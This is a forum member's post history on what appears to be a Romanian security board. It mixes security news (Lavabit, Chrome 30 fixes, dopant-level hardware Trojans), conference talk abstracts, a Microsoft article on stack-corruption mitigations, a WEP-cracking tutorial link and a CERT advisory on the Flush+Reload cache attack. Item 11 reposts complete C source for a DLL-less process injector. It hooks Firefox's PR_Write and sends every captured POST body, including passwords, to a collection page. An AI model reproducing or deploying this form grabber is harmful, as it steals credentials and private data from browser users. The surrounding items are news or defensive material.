
Nytro

Administrators
Everything posted by Nytro

  1. If you're on Linux: ls -ls /etc/ssl/certs/ If you're on Windows: 1. Start 2. certmgr.msc 3. Intermediate Certification Authorities 4. Certificates In both cases, look for the certificate "StartCom Class 1 Primary Intermediate Server CA" and check its expiration date. On Linux, depending on the certificate's path (on my machine it was a symlink): openssl x509 -in /usr/share/ca-certificates/mozilla/StartCom_Certification_Authority.crt -noout -startdate -enddate If the certificate isn't there, download this one: http://www.startssl.com/certs/sub.class1.server.ca.pem into "/etc/ssl/certs/". PS: If you're still running Windows 95/98/XP and haven't installed updates, you're beyond help.
  2. [h=1]FBI demands SSL Keys from Secure-Email provider Lavabit in Espionage probe[/h] During the summer, the secure e-mail provider Lavabit, the service preferred by PRISM leaker Edward Snowden, decided to shut down after 10 years to avoid being complicit in crimes against the American people. The U.S. Government had obtained a secret court order demanding Lavabit's private SSL key, which would have allowed the FBI to wiretap the service's users, according to Wired. Ladar Levison, 32, spent ten years building the encrypted email service Lavabit, attracting over 410,000 users. When NSA whistleblower Edward Snowden was revealed to be one of those users in July, Levison received court orders to comply, intended to trace the Internet IP address of a particular Lavabit user, but he refused to do so. The offenses under investigation are listed as violations of the Espionage Act, and the founder was ordered to record and provide the connection information for one of his users every time that user logged in to check his e-mail. The Government complained that Lavabit had the technical capability to decrypt the information but did not want to defeat its own system, so on the same day U.S. Magistrate Judge Theresa Buchanan ordered Lavabit to comply, threatening it with criminal contempt. The FBI's search warrant also demanded all information necessary to decrypt communications sent to or from the redacted Lavabit email account, including encryption keys and SSL keys. Because Lavabit hadn't complied by August 5, a court ordered that Levison be fined $5,000 a day beginning August 6 for every day he refused to turn over the key. On August 8, Levison finally decided to shut down Lavabit. “I’m taking a break from email,” said Levison. “If you knew what I know about email, you might not use it either.” Sursa: FBI demands SSL Keys from Secure-Email provider Lavabit in Espionage probe - The Hacker News
  3. Hitb 2013 - Nikita Tarakanov - Exploiting Hardcore Pool Corruptions In Ms Windows Kernel Description: PRESENTATION ABSTRACT: With each new version of the Windows OS, Microsoft enhances security by adding mitigation mechanisms, and kernel-land vulnerabilities are getting more and more valuable these days. For example, an easy way to escape from a sandbox (the Google Chrome sandbox, for example) is to use a kernel vulnerability. That's why Microsoft strives to enhance the security of the Windows kernel. The kernel pool allocator plays a significant role in the security of the whole kernel. Since Windows 7, Microsoft has been enhancing the security of the Windows kernel pool allocator. Tarjei Mandt aka @kernelpool has done a great job analyzing the internals of the Windows kernel pool allocator and found some great attack techniques, mitigation bypasses, etc. In Windows 8, however, Microsoft has eliminated almost all reliable techniques for exploiting kernel pool corruptions. Tarjei's attack techniques need a lot of prerequisites to succeed, and there are unfortunately many types of pool corruption where they don't work. What if there is no control over the overflown data? What if the data is constant (zero bytes) and you have no chance to apply one of Tarjei's techniques? What if there is an uncontrolled continuous overflow and a page fault (#PF) and BSOD are unavoidable? So what to do? Commit suicide instantly? NO! Come and see this talk! We present a technique for 100% reliable exploitation of kernel pool corruptions which covers all flavors of Windows from NT 4.0 to Windows 8. ABOUT NIKITA TARAKANOV Nikita Tarakanov is an independent information security researcher who has worked as an IS researcher at Positive Technologies, VUPEN Security and CISS. He likes writing exploits, especially for the Windows NT kernel, and won the PHDays Hack2Own contest in 2011 and 2012. He also tried to hack Google Chrome during Pwnium 2 at HITB2012KUL but failed. 
He has published a few papers about kernel mode drivers and their exploitation and is currently engaged in reverse engineering research and vulnerability search automation. For More Information please visit : - HITBSecConf - NETHERLANDS / MALAYSIA Sursa: Hitb 2013 - Nikita Tarakanov - Exploiting Hardcore Pool Corruptions In Ms Windows Kernel
  4. Hitb 2013 - Travis Goodspeed - Nifty Tricks And Sage Advice For Shellcode On Embedded Systems Description: PRESENTATION ABSTRACT: This lecture presents a bunch of clever tricks that will save you time and headaches when writing exploits for small embedded systems, such as smart meters, thermostats, keyboards, and mice. You'll learn how to write tiny shellcode that's quickly portable to any variant of ARM, as well as how to exploit memory corruption on an 8-bit micro that's incapable of executing RAM. You'll learn how to develop an embedded exploit without a debugger, and how to blindly assemble a ROP chain when you don't have a firmware image. Note: No machines harmed in this lecture had enough RAM to hold CALC.EXE. ABOUT TRAVIS GOODSPEED Travis Goodspeed is a neighborly reverse engineer from Southern Appalachia, where he is rumored to keep a warehouse full of GoodFET boards and a nifty satellite dish. His prior projects include a dozen key-extraction exploits for Zigbee and WSN devices, bootloader exploits for microcontrollers, and the Facedancer, a tool for emulating USB hardware in Python. For More Information please visit : - HITBSecConf - NETHERLANDS / MALAYSIA Sursa: Hitb 2013 - Travis Goodspeed - Nifty Tricks And Sage Advice For Shellcode On Embedded Systems
  5. [h=1]Steganos Safe 14 – FREE license[/h] By Radu FaraVirusi(com) on October 2, 2013 Privacy, online or offline, is a key thing everyone wants when sitting in front of the computer. Most of the time it can't be achieved, or it takes time and many programs of varying usefulness. Steganos Safe 14 is an excellent product that combines 8 basic utilities to achieve the goal stated above. "Steganos Safe" lets you create an unlimited number of secure virtual drives using the 256-bit Advanced Encryption Standard (AES) algorithm, each drive able to store up to 512 GB of data. "Portable Safe" does the same thing, except it uses a USB stick or a CD/DVD. You can encrypt any USB stick or CD, and when inserted into any other PC it will ask for the previously set password before giving access to the stored data. "Private Favorites" encrypts the sites bookmarked in Internet Explorer so they cannot be accessed by unauthorized persons. "File Manager" lets you create encrypted files, extract their contents and manage them properly. "Shredder" permanently deletes any file you never want recovered, by you or by anyone else who uses the PC. It uses several technologies, including DoD 5220.22-M/NISPOM 8-306. "Password Manager" lets you create encrypted lists containing user accounts, passwords, PIN codes, bank accounts and other passwords and usernames used online or offline on that computer. That way you won't have to hunt for them whenever you need them, and you won't have to worry about them either, because they are safe and protected by Steganos. The remaining utilities are "E-mail Encryption" and "Internet Trace Destructor". To get this software for FREE, go to the link below: https://www.steganos.com/specials/?m=chip&p=safe14 Enter a valid e-mail address and press "OK". You will receive the registration serial by e-mail. Sursa: Steganos Safe 14 – licenta GRATUITA
  6. Am I the only one who's glad about this?
  7. 50 Security Issues Fixed with the Release of Chrome 30 - 50 vulnerabilities fixed in Chrome October 2nd, 2013, 07:32 GMT · By Eduard Kovacs Google has released Chrome 30, and a total of 50 security issues have been fixed in this latest version. The list of vulnerabilities reported by external researchers includes ten high-impact and six medium-impact flaws. The high-impact issues refer to use-after-free vulnerabilities in inline-block rendering, in PPAPI, in XML document parsing, in the DOM, in the resource loader, in the Windows color chooser dialog, and in the template element. A memory corruption in V8 and an address bar spoofing bug related to the “204 No Content” status code also fall into this category. The medium-impact vulnerabilities include a use-after-free in Web Audio, an out-of-bounds read in the same component, and an out-of-bounds read in URL parsing. The security researchers credited with finding vulnerabilities are Atte Kettunen of OUSPG, Boris Zbarsky, Chamal de Silva, Byoungyoung Lee and Tielei Wang of Georgia Tech, cloudfuzzer, Khalil Zhani, Wander Groeneveld, Masato Kinugawa, Adam Haile of Concrete Data, and Jon Butler. They’ve been rewarded with a total of $19,000 (€14,000) for their work. Atte Kettunen, cloudfuzzer, and miaubiz have been awarded an additional $8,000 (€5,900) for working with Google on addressing security issues during the development cycle. Download Google Chrome Sursa: 50 Security Issues Fixed with the Release of Chrome 30
  8. Undetectable hardware Trojans could compromise cryptography By Brian Dodson October 2, 2013 Undetectable hardware Trojans could subvert cryptographic security (Image: Shutterstock) Researchers have shown that it is possible to compromise the functioning of a cryptographic chip without changing its physical layout. Based on altering the distribution of dopants in a few components on the chip during fabrication, this method represents a big challenge for cyber-security as it is nearly impossible to detect with any currently practical detection scheme. Progress in the design and fabrication of processor chips is mainly aimed at making them faster and smaller. There is another important requirement, however – ensuring that they function as intended. In particular, the cryptographic functions of new chips must provide the level of security with which they were designed. If they fail in this task, even use of sophisticated security software, physical isolation, and well vetted operators cannot ensure the security of a system. Such structural attacks on the functions of a chip are called hardware Trojans, and are capable of rendering ineffective the security protecting our most critical computer systems and data. Both industry and governments have put a great deal of not very public effort into the problem of hardware Trojans. The most reliable tests to find hardware Trojans will be applied to the finished product. So how are they tested and what are the implications of the new research? Functional Testing Functional testing is the sort of testing with which most people are familiar. The function of a chip is tested by applying patterns of test inputs to the input pins of the chip. The outputs are monitored, and compared with the outputs expected from the original specifications and definition of the chip. Extremely sophisticated devices for functional testing abound in the world of IC design and fabrication. 
Unfortunately, such testing is usually not very effective for finding hardware Trojans. It is impossible in any practical sense to test all patterns of activation of all components in the chip, so the test patterns are usually designed to test all the known gates on the chip. While such patterns catch most accidental design flaws and fabrication defects, they are likely to fail to activate malicious logic elements added to the original design. Optical Reverse-Engineering The most direct approach to find hardware Trojans is to disassemble the chip layer by layer, and compare it with the correct structural design. If there is a visible difference (possibly detected with scanning electron microscopy rather than a camera) between the layers of the chip as designed and the layers of the actual chip, there is a problem that needs to be diagnosed. This is essentially the procedure that would be undertaken to reverse-engineer a chip. While reverse-engineering a chip sounds like a good way to detect hardware alterations, the problem is considerably more slippery when the goal is to find hardware Trojans. When reverse-engineering is the goal, you start with your competitor's chip, and try to decipher and duplicate the chip. While various techniques can be applied to the chip to complicate this process, you are never in any doubt that the original chip works properly. If a production chip is suspected of harboring hardware Trojans, however, the structure revealed in the disassembly process must be compared with some reference design. The ideal reference is a "golden chip", meaning a chip known to accurately reflect the goals of the desired chip functionality with no additions, subtractions, or alterations. We'll talk about where such a chip might come from later. Side-channel analysis Side channels refer to side effects of proper operation of a chip being subjected to a functional test. 
These include the amount of power consumed by the chip, the timing of the signals at the chip pins, and emissions of electromagnetic radiation. Hardware Trojans that add, subtract, or alter enough gates can often be detected in this manner, but the proportion of affected gates has to be one in a thousand or more. In a microprocessor with a billion gates, a million gates would have to be changed for the corresponding Trojan to be detected. Smaller Trojans simply escape notice. The Golden Chip All of the testing methods described above are far more likely to find circuit flaws and faults if they have a certified reference chip, a golden chip, to which the testing results can be compared. Comparison to simulated chip structure and function is not likely to be sufficiently accurate to ensure detection of Trojans. Unfortunately, the complex design and fabrication process is nearly always farmed out to contractors and subcontractors worldwide. While this approach to design and fabrication is cost-effective, the overall manufacturing entity gives up a good deal of control over the various stages of the process. As a result, it is hard to be sure that your golden chip isn't simply a gilt imitation. If a supposedly golden chip actually contains the same hardware Trojans as do the production chips, all the comparative testing in the world won't find them. Dopant-level hardware Trojans As if the potential problems of detecting hardware Trojans in the form of additional and/or sabotaged circuitry were not sufficiently difficult, a team of researchers from the University of Massachusetts, the Technical University of Delft, the University of Lugano, and the Görtz Institute for IT-Security have identified a new way in which hardware Trojans could be added to a chip that is essentially undetectable by any of the methods described above. 
Using that technique, they succeeded in sabotaging the pseudorandom number generator at the heart of the cryptographic functions of the Intel Ivy Bridge processors, which include most of the Intel i3, i5, and i7 processors built using Intel's 22 nm manufacturing process. The UMass team has demonstrated disruption of the Ivy Bridge chip so that it generates far simpler pseudorandom numbers. The resulting chip does not provide acceptable levels of cryptographic security. The authors of this research point out that altered doping profiles are currently used in commercial code-obfuscation systems to prevent an attacker from optically reverse-engineering a chip. This suggests that the changes required to convert an inverter gate into a Trojan gate will not be detected by such structural analysis. Methods do exist to probe the local doping characteristics of a silicon layer, which could in principle be used to identify a hardware Trojan of the type described in the present research. However, these methods examine one tiny patch of material at a time, making their use to check a billion transistors impractical. The doping-profile Trojan approach identified by the UMass-based research team could be applied in many ways to compromise the functionality of cryptographic systems without being noticed. Now that the possibility of such stealthy attacks on cryptographic systems has been established, a great deal of effort will doubtless go into improving our ability to detect them. Source: Stealthy Dopant-Level Hardware Trojans [PDF] Sursa: Undetectable hardware Trojans could compromise cryptography
  9. Software Defense: mitigating stack corruption vulnerabilities swiat 2 Oct 2013 3:16 AM Introduction One of the oldest forms of memory safety exploitation is that of stack corruption vulnerabilities, with several early high-profile exploits being of this type. It seems fitting, therefore, to kick off this Software Defense series by looking at the status of software defense today with respect to this age-old problem. Mitigating stack-based corruption vulnerabilities The most common form of stack corruption – overrun of a buffer beyond the amount of stack space that was allocated for it – has been mitigated to some degree since Windows XP via the compiler-based /GS feature. A copy of a per-module random value, the /GS cookie, is placed between the stack local variables and stack metadata including the return address. Before using the return address, the program verifies the integrity of this local copy of the /GS cookie: if its value does not match the master per-process value, then an overrun is assumed to have taken place and the program is terminated. The limitations of this defensive device have driven a number of refinements over the years; the main ones are summarized in the following table: Scope of GS protection For performance reasons, only a subset of functions are protected with a GS cookie. The scope of this protection was initially aimed primarily at character arrays, where attackers would supply malicious strings, often over the network, that the program did not handle correctly. GS enhancements in Visual Studio 2010 extended the scope of GS protection to functions with a far more general range of data structures. Visual Studio 2013 builds on this further and also protects arrays of pointers. Protecting a function with /GS has a codesize cost – the prolog code to set up the GS cookie on the stack and the epilog to verify its value – and the runtime cost of actually executing these extra instructions. 
The cost of extending the scope of GS protection has been partially offset by a new compiler optimization: if usage of the buffers that have led to the GS cookie can be proven safe by the optimizer – i.e. all writes to the memory associated with these variables are within the bounds of their allocated stack space – then the GS cookie is eliminated. Enabling /GS still typically only inserts a GS check on less than 10% of functions – though clearly this varies considerably depending on usage of local variables in each individual application. Evading the GS check through exception abuse An important aspect touched on above deserves further discussion – the cookie check only occurs at the end of the function. This means that there is a window between the stack corruption and the GS check in which an attacker can seek to gain control. One favoured approach has been to trigger an exception and abuse the resulting exception handling process. On x86, exception metadata associated with SEH is stored on the stack: this includes pointers to the handler code that should be invoked. If the attacker can use the initial stack corruption to modify this SEH metadata – replacing the function pointer with an address of his choosing – then when the exception dispatching code runs, it will transfer control to the attacker-controlled address. Mitigating exception metadata abuse on x86 platforms Again, compile-time techniques can help: /SAFESEH effectively creates a whitelist of exception handler addresses. In the corrupted SEH metadata scenario above, the attacker’s modified ‘pointer to exception handler’ address is not on the whitelist, thus defeating the simple form of this exploitation technique. It is however costly: all code needs to be recompiled to benefit – as any non-SAFESEH code in the program introduces a “code with unknown SAFESEH whitelist” module – which for application compatibility purposes means that any address inside that module is assumed to be on the whitelist. 
Windows XP SP2 included a recompile of most OS binaries with /SAFESEH – but even that is not sufficient. Any 3rd party browser plugin (not compiled with /SAFESEH) provided a potential means to evade the /SAFESEH validation. SEHOP SEHOP, supported initially in Windows Vista SP1 (off-by-default) and Windows Server 2008 (on-by-default), provides a more robust solution. We previously described SEHOP in detail, but a summary of the basic idea is as follows. When an exception occurs, SEHOP walks the entire list of SEH metadata structures on the stack and verifies that it terminates at a special “known good handler address”. Any attacker corruption of one of these structures overwrites the forward pointer to the next SEH metadata structure and so breaks the integrity of the list, which is therefore detected by the SEHOP check. Windows 7 added support for per-process opt-in to SEHOP. SEHOP in Windows 8 and Windows 8.1 Windows 8 raises the bar in that SEHOP is enabled by default for applications that are built to run on Windows 8 and above (more precisely, for any application built with subsystem version greater than or equal to 6.2 – see /SUBSYSTEM for details). In Windows 8.1, SEHOP is further improved in a couple of ways. First, SEHOP now has a range of 64 possible distinguished FinalExceptionHandler values that may be chosen, instead of just the one handler address within the system DLL that was used previously. The actual distinguished FinalExceptionHandler value used to validate the exception handling frame chain is selected at random during process startup, and differs on a per-process basis. The advantage of this is that SEHOP no longer has a system-wide shared secret, but a per-process secret, such that a local attacker can no longer assume that they know the distinguished value required to pass the frame validation check in a separate process on the local machine. All of the possible FinalExceptionHandler values are also valid SafeSEH handlers. 
Secondly, Windows 8.1 adds support for SEHOP in kernel mode and enables this by default. Like the enhanced version of SEHOP for user mode, kernel mode SEHOP has 64 possible FinalExceptionHandler addresses, so just disclosing the kernel base address is not enough to defeat kernel SEHOP; one has to be able to read arbitrary kernel memory to do that. GS limitations and future work The effectiveness of the GS design described thus far – even if it were applied to every stack frame and one assumed that the cookie check were always reached after stack memory corruption occurred – is limited to cases where the cookie value is altered. This is what is detected. Important classes of stack-based vulnerability therefore remain that are not mitigated today for example targeted attacker-controlled writes to a stack address, or stack underruns – i.e. the direction of the writes goes towards the start address of the allocation. Visual Studio 2012 updates /GS to emit range checks to mitigate one of the most common types of targeted write scenario that we were seeing through MSRC. Recently published trend data shows that the number of successful exploits of stack-based vulnerabilities represents but a handful of the set of issues faced by our customers. The obstacles posed by GS, SafeSEH and SEHOP and opt-in to these measures by increasing numbers of developers and IT professionals are likely part of the reason behind this. Investment in static analysis tooling has also likely played a part, some of which is available to developers through compiler warnings such as C4789 and CodeAnalysis warnings such as C6200. The lifetime of a stack-based buffer tends to be shorter than its heap counterpart: it is limited to execution of one function – albeit potentially with many callees – making it more tractable to completely analyse its use across the entire program. 
By contrast, pointers to heap allocations are frequently stored in multiple objects with a more complex usage pattern by the program, making it harder for analysis to track usage of a heap buffer with the same level of precision. Although some unmitigated stack-based vulnerability classes do occasionally arise in practice (for example MS08-067, which was an underrun of a stack-based array), these are relatively isolated examples. As attacker focus has shifted to the heap, so the priority accorded to improving defensive measures there has increased. Conclusion Exploitation of stack-based corruption vulnerabilities is one of the oldest forms of memory safety exploit. History shows a succession of mitigation refinements developed to counter attacker innovations in this area. We note a series of evolutions: - Mitigation robustness and completeness has improved over time, including the protection of arrays of pointers by /GS in Visual Studio 2013 and a move to a per-process rather than a system-wide secret for SEHOP in Windows 8.1. - Counter-measures to thwart exception handler abuse have evolved from expensive (from an engineering perspective) measures such as /SAFESEH, which require recompilation, to OS-based SEHOP that can be applied on a per-process basis to existing applications. - Default settings have evolved over time; e.g. user-mode SEHOP is now on-by-default for applications designed for Windows 8 and Windows 8.1, and kernel mode SEHOP is both new and enabled in Windows 8.1. A state of relative maturity has been reached, with fewer stack-based vulnerabilities being reported or exploited. Does this mean we are “done”? By no means! Rather, attacker attention appears to have turned to other, less mature areas. And as attacker focus has shifted, so has defense. The next article takes a closer look at some of the advances related to memory corruption on the heap. 
Tim Burrell, MSEC Security Science Sursa: https://blogs.technet.com/b/srd/archive/2013/10/02/software-defense-mitigating-stack-corruption-vulnerabilties.aspx?Redirected=true
  10. Automated Wep Cracking With Wiffy Script Description: In this tutorial for Cr0w's Place we are cracking the WEP protocol with an automated script called Wiffy. You can download wiffy.sh from here: Nitrobits.com - Download wiffy.sh You can buy the Alfa AWUS036H card that I used from: Amazon.com : Alfa AWUS036H 1000mW 1W 802.11b/g USB Wireless WiFi network Adapter with 5dBi Antenna and Suction cup Window Mount dock - for Wardriving & Range Extension : Usb Computer Network Adapters : Computers & Accessories Compatibility list for wifi hardware: compatibility_drivers [Aircrack-ng] Everything you are going to see is for educational purposes only, so operate carefully and on your own property. I bear no responsibility for what happens to you if you act irresponsibly. If you like my work, please subscribe. Thank you for watching. Sursa: Automated Wep Cracking With Wiffy Script
  11. [h=1][C]FireFox PR_Write Hook[/h][h=3] TheAnomaly Posted 24 December 2010 - 05:05 PM [/h]This is a DLL-less PR_Write function hooker for Firefox; in other words, it will send all POST data sent from Firefox to your own page, where it can be sorted and stored. It could be optimized by using another thread or process to send the captured POST data, but at the moment it doesn't really slow Firefox down. It was tested with version 3.6 or so but should work on the latest version too.

#include <stdio.h>
#include <windows.h>
#include <Tlhelp32.h>
#include <wininet.h>

typedef HMODULE (WINAPI *GMH)(LPCTSTR);
typedef FARPROC (WINAPI *GPA)(HMODULE, LPCSTR);
typedef int (WINAPI *VP)(LPVOID, SIZE_T, DWORD, PDWORD);
typedef HINTERNET (WINAPI *IO)(LPCTSTR, DWORD, LPCTSTR, LPCTSTR, DWORD);
typedef HINTERNET (WINAPI *IC)(HINTERNET, LPCTSTR, INTERNET_PORT, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD_PTR);
typedef HINTERNET (WINAPI *HOR)(HINTERNET, LPCTSTR, LPCTSTR, LPCTSTR, LPCTSTR, LPCTSTR*, DWORD, DWORD_PTR);
typedef BOOL (WINAPI *HSR)(HINTERNET, LPCTSTR, DWORD, LPVOID, DWORD);
typedef VOID (WINAPI *Slep)(DWORD);

typedef struct {
    GMH GetMH;              // GetModuleHandle
    GPA GetPA;              // GetProcAddress
    VP SetVP;               // VirtualProtect
    Slep Slepx;             // Sleep
    char ModuleName[36];    // "nspr4.dll"
    char Proc[36];          // "PR_Write"
    BYTE *PR_Write;
    BYTE *nptr;
    DWORD *bptr;
    DWORD OldProtect;
    char blank[3];
    char localhost[16];
    char post[10];
    char visit[16];
    char header[64];
    HINTERNET OpenHandle;
    HINTERNET ConnectHandle;
    HINTERNET Handle;
    int nLen;
    char *pVar;
    IO IOx;
    IC ICx;
    HOR HORx;
    HSR HSRx;
} Inject_Data;

void Hook(Inject_Data *pData);

int main()
{
    Inject_Data Data;
    LPVOID Mem, Prm;
    HANDLE rThread;
    HANDLE handle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    PROCESSENTRY32 ProcessInfo;
    ProcessInfo.dwSize = sizeof(PROCESSENTRY32);
    LoadLibrary("wininet.dll");

    // Resolve the APIs the injected code will need inside the target process
    Data.GetMH = (GMH)GetProcAddress(GetModuleHandle("kernel32.dll"), "GetModuleHandleA");
    Data.GetPA = (GPA)GetProcAddress(GetModuleHandle("kernel32.dll"), "GetProcAddress");
    Data.IOx   = (IO)GetProcAddress(GetModuleHandle("wininet.dll"), "InternetOpenA");
    Data.ICx   = (IC)GetProcAddress(GetModuleHandle("wininet.dll"), "InternetConnectA");
    Data.HORx  = (HOR)GetProcAddress(GetModuleHandle("wininet.dll"), "HttpOpenRequestA");
    Data.HSRx  = (HSR)GetProcAddress(GetModuleHandle("wininet.dll"), "HttpSendRequestA");
    Data.SetVP = (VP)GetProcAddress(GetModuleHandle("kernel32.dll"), "VirtualProtect");
    Data.Slepx = (Slep)GetProcAddress(GetModuleHandle("kernel32.dll"), "Sleep");

    wsprintf(Data.ModuleName, "nspr4.dll");
    wsprintf(Data.Proc, "PR_Write");
    wsprintf(Data.localhost, "localhost");
    wsprintf(Data.post, "POST");
    wsprintf(Data.visit, "/hit.php");
    wsprintf(Data.header, "Content-Type:application/x-www-form-urlencoded");
    wsprintf(Data.blank, "");

    // Find firefox.exe, copy the data block and the Hook function into it,
    // then run Hook in a remote thread
    while (Process32Next(handle, &ProcessInfo))
    {
        if (!strcmp(ProcessInfo.szExeFile, "firefox.exe"))
        {
            handle = OpenProcess(PROCESS_ALL_ACCESS, 0, ProcessInfo.th32ProcessID);
            Prm = VirtualAllocEx(handle, NULL, sizeof(Data), MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE);
            WriteProcessMemory(handle, Prm, &Data, sizeof(Data), NULL);
            Mem = VirtualAllocEx(handle, NULL, 2000, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            WriteProcessMemory(handle, Mem, Hook, 2000, NULL);
            rThread = CreateRemoteThread(handle, NULL, 0, (LPTHREAD_START_ROUTINE)Mem, Prm, 0, NULL);
            WaitForSingleObject(rThread, INFINITE);
            CloseHandle(handle);
        }
    }
    return 0;
}

void Hook(Inject_Data *pData)
{
    BYTE *temp;
    goto start;

Hooked:             // body of the detour placed over PR_Write
    __asm{
        mov ecx,[esp+0xC]
        mov eax,[esp+0x8]
        cmp dword ptr[eax],0x54534F50   // "POST"?
        jne prexJMP                     // it's not POST
        push ecx
        call getDelta4                  // get the delta
getDelta4:
        pop ecx
        sub ecx,offset getDelta4
        lea eax,Data
        add eax,ecx
        pop ecx
        mov eax,[eax]
        mov pData,eax
        mov eax,[esp+0x8]
        mov temp,eax
    }
    pData->pVar = temp;                 // buffer passed to PR_Write
    __asm{ nop }
    __asm{ mov ecx,[esp+0xC] }
    __asm{ mov temp,ecx }
    __asm{ nop }
    pData->nLen = (int)temp;            // its length
    __asm{ nop }

    // temporarily rewrite the leading "PO" to "r=" so the captured data
    // posts as a form field, send it, then restore the original bytes
    *pData->pVar = 0x72; pData->pVar++;
    *pData->pVar = 0x3D; pData->pVar--;
    pData->Handle = pData->ICx(pData->OpenHandle, pData->localhost, 8080,
                               pData->blank, pData->blank, INTERNET_SERVICE_HTTP, 0, 0);
    pData->ConnectHandle = pData->HORx(pData->Handle, pData->post, pData->visit,
                                       NULL, NULL, NULL, INTERNET_FLAG_KEEP_CONNECTION, 0);
    pData->HSRx(pData->ConnectHandle, pData->header, -1L, pData->pVar, pData->nLen);
    *pData->pVar = 0x50; pData->pVar++;
    *pData->pVar = 0x4F; pData->pVar--;

prexJMP:            // execute the two instructions overwritten at PR_Write
    __asm{
        MOV EAX,DWORD PTR [ESP+4]
        MOV ECX,DWORD PTR [EAX]
    }
xJMP:               // patched at runtime to jump back into the real PR_Write
    __asm{ jmp ExitProcess }
Data:               // placeholder that receives the remote Inject_Data pointer
    __asm{ nop }
    __asm{ nop }
    __asm{ nop }
    __asm{ nop }

start:
    pData->PR_Write = (BYTE*)pData->GetPA(pData->GetMH(pData->ModuleName), pData->Proc);
    pData->SetVP(pData->PR_Write, 6, PAGE_EXECUTE_READWRITE, &pData->OldProtect);

    // compute the delta-corrected address of Hooked
    __asm{ push ecx }
    __asm{ call getDelta }          // get the delta
    __asm{ getDelta: }
    __asm{ pop ecx }
    __asm{ sub ecx,offset getDelta }
    __asm{ push eax }
    __asm{ lea eax,Hooked }
    __asm{ add eax,ecx }
    __asm{ mov temp,eax }
    __asm{ pop eax }
    __asm{ pop ecx }

    // write a JMP rel32 to Hooked (plus an INT3 pad) over PR_Write
    pData->nptr = temp;
    pData->nptr = (BYTE*)(pData->nptr - pData->PR_Write);
    pData->nptr = pData->nptr - 5;
    *pData->PR_Write = 0xE9;  pData->PR_Write++;
    pData->bptr = (DWORD*)pData->PR_Write;
    *pData->bptr = (DWORD)pData->nptr;
    pData->PR_Write = pData->PR_Write + 4;
    *pData->PR_Write = 0xCC;  pData->PR_Write++;

    // compute the delta-corrected address of xJMP
    __asm{ push ecx }
    __asm{ call getDelta1 }         // get the delta
    __asm{ getDelta1: }
    __asm{ pop ecx }
    __asm{ sub ecx,offset getDelta1 }
    __asm{ push eax }
    __asm{ lea eax,xJMP }
    __asm{ add eax,ecx }
    __asm{ mov temp,eax }
    __asm{ pop eax }
    __asm{ pop ecx }

    // point the jmp at xJMP back to the remainder of the real PR_Write
    pData->nptr = temp;
    pData->PR_Write = (BYTE*)(pData->PR_Write - pData->nptr);
    pData->PR_Write = pData->PR_Write - 5;
    pData->nptr++;
    pData->OldProtect = 0;
    pData->SetVP(pData->nptr, 10, PAGE_EXECUTE_READWRITE, &pData->OldProtect);
    pData->bptr = (DWORD*)pData->nptr;
    *pData->bptr = (DWORD)pData->PR_Write;

    // store the Inject_Data pointer into the Data placeholder
    temp = (BYTE *)pData;
    __asm{ push ecx }
    __asm{ call getDelta2 }         // get the delta
    __asm{ getDelta2: }
    __asm{ pop ecx }
    __asm{ sub ecx,offset getDelta2 }
    __asm{ push eax }
    __asm{ push ebx }
    __asm{ lea eax,Data }
    __asm{ add eax,ecx }
    __asm{ mov ebx,temp }
    __asm{ mov dword ptr[eax],ebx }
    __asm{ pop ebx }
    __asm{ pop eax }
    __asm{ pop ecx }

    /* start the connection */
    pData->OpenHandle = pData->IOx(pData->localhost, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
    for (;;)    // keep the remote thread alive (the original had a mangled "for(")
    {
        pData->Slepx(1000);
    }
}

Sursa: [C]FireFox PR_Write Hook - Source Codes - rohitab.com - Forums
  12. L3 CPU shared cache architecture is susceptible to a Flush+Reload side-channel attack

Overview

L3 CPU shared cache architecture is susceptible to a Flush+Reload side-channel attack, resulting in information leakage and allowing a local attacker to derive the contents of memory not belonging to the attacker.

Description

Common L3 CPU shared cache architecture is susceptible to a Flush+Reload side-channel attack, as described in "Flush+Reload: a High Resolution, Low Noise, L3 Cache Side-Channel Attack" by Yarom and Falkner. By manipulating memory stored in the L3 cache by a target process and observing timing differences between requests for cached and non-cached memory, an attacker can derive specific information about the target process. The paper demonstrates an attack against GnuPG on an Intel Ivy Bridge platform that recovers over 98% of the bits of an RSA private key. This vulnerability is an example of CWE-200: Information Exposure.

Impact

A local attacker can derive the contents of memory shared with another process on the same L3 cache (same physical CPU). Virtualization and cryptographic software are examples that are likely to be vulnerable. An attacker on the same host operating system only needs read access to the executable file or a shared library component of the target process. An attacker on a different virtual machine similarly needs access to an exact copy of the executable or shared library used by the target process, and the hypervisor needs to have memory page de-duplication enabled.

Solution

Apply an Update
See the Vendor Information section below for additional information. GnuPG has released GnuPG version 1.4.14 and Libgcrypt 1.5.3 to address this vulnerability. CVE-2013-4242 has been assigned to the specific GnuPG vulnerability described in the Yarom/Falkner paper. The CVSS score below applies specifically to CVE-2013-4242.

Disable Memory Page De-duplication
To prevent this attack on virtualization platforms, disable hypervisor memory page de-duplication.

Vendor Information

Vendor               Status        Date Notified   Date Updated
libgcrypt            Affected      16 Aug 2013     16 Aug 2013
Linux KVM            Affected      15 Aug 2013     16 Aug 2013
Red Hat, Inc.        Affected      13 Sep 2013     13 Sep 2013
VMware               Affected      16 Aug 2013     03 Sep 2013
Xen                  Affected      16 Aug 2013     03 Sep 2013
Cryptlib             Not Affected  16 Aug 2013     03 Sep 2013
GnuTLS               Not Affected  16 Aug 2013     03 Sep 2013
Intel Corporation    Not Affected  16 Aug 2013     03 Sep 2013
OpenSSL              Not Affected  16 Aug 2013     03 Sep 2013
Amazon               Unknown       16 Aug 2013     03 Sep 2013
AMD                  Unknown       16 Aug 2013     16 Aug 2013
Attachmate           Unknown       16 Aug 2013     03 Sep 2013
Certicom             Unknown       16 Aug 2013     16 Aug 2013
Crypto++ Library     Unknown       16 Aug 2013     16 Aug 2013
EMC Corporation      Unknown       16 Aug 2013     16 Aug 2013

CVSS Metrics

Group          Score  Vector
Base           2.4    AV:L/AC:H/Au:S/C:P/I:P/A:N
Temporal       1.9    E:POC/RL:OF/RC:C
Environmental  2.3    CDP:ND/TD:M/CR:H/IR:H/AR:ND

References

http://eprint.iacr.org/2013/448.pdf
CWE - CWE-200: Information Exposure (2.5)
[Announce] [security fix] GnuPG 1.4.14 released
[Announce] [security fix] Libgcrypt 1.5.3 released

Credit

